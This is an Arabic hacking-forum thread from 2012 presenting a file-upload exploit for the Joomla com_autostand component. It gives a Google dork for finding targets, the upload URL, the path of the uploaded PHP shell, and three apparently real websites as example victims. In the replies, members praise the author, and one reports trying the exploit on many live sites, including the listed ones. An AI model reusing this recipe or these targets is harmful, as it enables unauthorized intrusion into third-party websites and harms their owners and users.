TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > قسم الحماية - Security section > قسم جديد الثغرات > قسم جديد ثغرات الأعضاء

قسم جديد ثغرات الأعضاء يختص بجديد ثغرات الأعضاء

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 08-11-2012, 03:32 PM
الصورة الرمزية over-x
over-x
:: عضو خاص ::
TeaM C
 
حـالة التــواجـد : over-x غير متواجد حالياً
تاريخ التسجيل: Oct 2010
الجــــنــــــس: ذكـر
المشاركات: 267
شكراً:125
تم شكره 361 مرة في 81 مشاركة
معدل تقييم المستوى: 10
over-x على طريق التميز
افتراضي joomla com_autostand file upload

كود PHP:
# Exploit Title:  joomla com_autostand file upload
# Author: Over-X
# email: [email protected]
# Vendor or Software Link: forum.joomla.org
# Version: v3
# Google dork: "inurl:com_autostand"
# Tested on: win Xp
 
 
-------------------------------------------------------------------------------

poc:
----


localhost/path/index.php?option=com_autostand&func=newItem

upload shell php 
and go 2 :
--------------------------

localhost/path/images/autostand/images/shell.php

examples
:

http://vcmauto.com//index.php?option=com_autostand&func=newItem
http://driver4u.co.il//index.php?option=com_autostand&func=newItem
http://www.dohenysupplies.com/index.php?option=com_autostand&func=newItem



---------------------------------------------------------------------------------------
GreSec4ever.com Damane2011 Invectus Kha&mix 4chrf ked Ans Black_Specter 

                 
ms_dz indoushka jago-dz L3b r1z b0x scorpion_tn 
 

 

 


رد مع اقتباس
11 أعضاء قالوا شكراً لـ over-x على المشاركة المفيدة:
  #2  
قديم 08-11-2012, 03:37 PM
الصورة الرمزية B07 M4S73R
B07 M4S73R
SEC4EVER
 
حـالة التــواجـد : B07 M4S73R غير متواجد حالياً
تاريخ التسجيل: Feb 2012
مكـان الإقامـة : إتحاد المغرب العربي
الجــــنــــــس: ذكـر
المشاركات: 898
شكراً:1,504
تم شكره 1,592 مرة في 536 مشاركة
معدل تقييم المستوى: 10
B07 M4S73R تم تعطيل التقييم
افتراضي رد: joomla com_autostand file upload

شابة بزااف يعطيك صحة خويا  
رد مع اقتباس
  #3  
قديم 08-11-2012, 03:49 PM
الصورة الرمزية over-x
over-x
:: عضو خاص ::
TeaM C
 
حـالة التــواجـد : over-x غير متواجد حالياً
تاريخ التسجيل: Oct 2010
الجــــنــــــس: ذكـر
المشاركات: 267
شكراً:125
تم شكره 361 مرة في 81 مشاركة
معدل تقييم المستوى: 10
over-x على طريق التميز
افتراضي رد: joomla com_autostand file upload

اقتباس:
المشاركة الأصلية كتبت بواسطة B07 M4S73R مشاهدة المشاركة

شابة بزااف يعطيك صحة خويا

مرسي حنوني  

 

 


رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ over-x على المشاركة المفيدة:
  #4  
قديم 08-11-2012, 05:13 PM
الصورة الرمزية Filsof Hacker
Filsof Hacker
عضو جديد
 
حـالة التــواجـد : Filsof Hacker غير متواجد حالياً
تاريخ التسجيل: Nov 2012
الجــــنــــــس: ذكـر
المشاركات: 9
شكراً:1
تم شكره 7 مرة في 4 مشاركة
معدل تقييم المستوى: 0
Filsof Hacker بدون تقييم
افتراضي رد: joomla com_autostand file upload

ماشاء الله عليك مبدع وثغرتين بين امس واليوم وهذا ان دل يدل على ابداعك والله يوفقك ان شاء الله  
رد مع اقتباس
  #5  
قديم 08-11-2012, 05:30 PM
الصورة الرمزية ishakdz
ishakdz
عضو مميز
 
حـالة التــواجـد : ishakdz غير متواجد حالياً
تاريخ التسجيل: Jul 2011
الجــــنــــــس: ذكـر
المشاركات: 147
شكراً:554
تم شكره 107 مرة في 64 مشاركة
معدل تقييم المستوى: 9
ishakdz على طريق التميز
افتراضي رد: joomla com_autostand file upload

جربتها على العديد من المواقع وعلى المواقع اللى واضعهم امثلة
لكن المشكل Invalid file format, or missing file !
يعنى لم تشتغل ,  
رد مع اقتباس
  #6  
قديم 08-11-2012, 06:03 PM
الصورة الرمزية Kha&miX
Kha&miX
عضو نشيط
 
حـالة التــواجـد : Kha&miX غير متواجد حالياً
تاريخ التسجيل: Jan 2011
الجــــنــــــس: ذكـر
المشاركات: 45
شكراً:204
تم شكره 5 مرة في 4 مشاركة
معدل تقييم المستوى: 0
Kha&miX على طريق التميز
افتراضي رد: joomla com_autostand file upload

شكرا اخي @Over-X تسلم يا بطل يا وحش خخخخخخخخخخخخخخخخخخ  

 

 

------------------
Kha
&miX

------------------
B4C_2011 d0n3 HmD
رد مع اقتباس
  #7  
قديم 08-11-2012, 06:05 PM
الصورة الرمزية over-x
over-x
:: عضو خاص ::
TeaM C
 
حـالة التــواجـد : over-x غير متواجد حالياً
تاريخ التسجيل: Oct 2010
الجــــنــــــس: ذكـر
المشاركات: 267
شكراً:125
تم شكره 361 مرة في 81 مشاركة
معدل تقييم المستوى: 10
over-x على طريق التميز
افتراضي رد: joomla com_autostand file upload

شكرا يا اخي القحطاني على ردك يا وحش خخخخ تبا  

 

 


رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ over-x على المشاركة المفيدة:
  #8  
قديم 08-11-2012, 06:06 PM
الصورة الرمزية Kha&miX
Kha&miX
عضو نشيط
 
حـالة التــواجـد : Kha&miX غير متواجد حالياً
تاريخ التسجيل: Jan 2011
الجــــنــــــس: ذكـر
المشاركات: 45
شكراً:204
تم شكره 5 مرة في 4 مشاركة
معدل تقييم المستوى: 0
Kha&miX على طريق التميز
افتراضي رد: joomla com_autostand file upload

هههههه حسين كم أنت رائع لول  

 

 

------------------
Kha
&miX

------------------
B4C_2011 d0n3 HmD
رد مع اقتباس
  #9  
قديم 08-11-2012, 06:07 PM
الصورة الرمزية over-x
over-x
:: عضو خاص ::
TeaM C
 
حـالة التــواجـد : over-x غير متواجد حالياً
تاريخ التسجيل: Oct 2010
الجــــنــــــس: ذكـر
المشاركات: 267
شكراً:125
تم شكره 361 مرة في 81 مشاركة
معدل تقييم المستوى: 10
over-x على طريق التميز
افتراضي رد: joomla com_autostand file upload

اقتباس:
المشاركة الأصلية كتبت بواسطة ishakdz مشاهدة المشاركة

جربتها على العديد من المواقع وعلى المواقع اللى واضعهم امثلة
لكن المشكل invalid file format, or missing file !
يعنى لم تشتغل ,

يا اخي انا قلتلك الشل المناسب هو في الثغرة السابقة حمله و ارفع  

 

 


رد مع اقتباس
  #10  
قديم 08-11-2012, 06:31 PM
الصورة الرمزية Spy r00t
Spy r00t
عضو جديد
 
حـالة التــواجـد : Spy r00t غير متواجد حالياً
تاريخ التسجيل: Mar 2012
الجــــنــــــس: ذكـر
المشاركات: 24
شكراً:4
تم شكره 10 مرة في 9 مشاركة
معدل تقييم المستوى: 0
Spy r00t بدون تقييم
افتراضي رد: joomla com_autostand file upload

بطل على الاكتشاف ولكن المواقع المصابه قليل جدآ  
رد مع اقتباس

الكلمات الدلالية (Tags)
comautostand, com_autostand, file, joomla, upload


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[Web Applications] - Joomla Component com_aclsfgpl File Upload Vulnerability exploit4arab قسم جديد ثغرات مواقع الحماية 2 23-02-2014 04:38 PM
[web applications] - Joomla Component GarysCookBook v3.0.x File Upload Vulnerability inj3ct0r قسم جديد ثغرات مواقع الحماية 0 28-01-2013 02:34 AM
JCE Joomla Extension Remote File Upload neo111 أساسيات حماية وتطوير السكريبتات 6 17-10-2012 02:29 PM
[webapps] - Joomla com_remository Remote Upload File exploit-db قسم جديد ثغرات مواقع الحماية 0 27-08-2010 01:12 AM


الساعة الآن 08:55 AM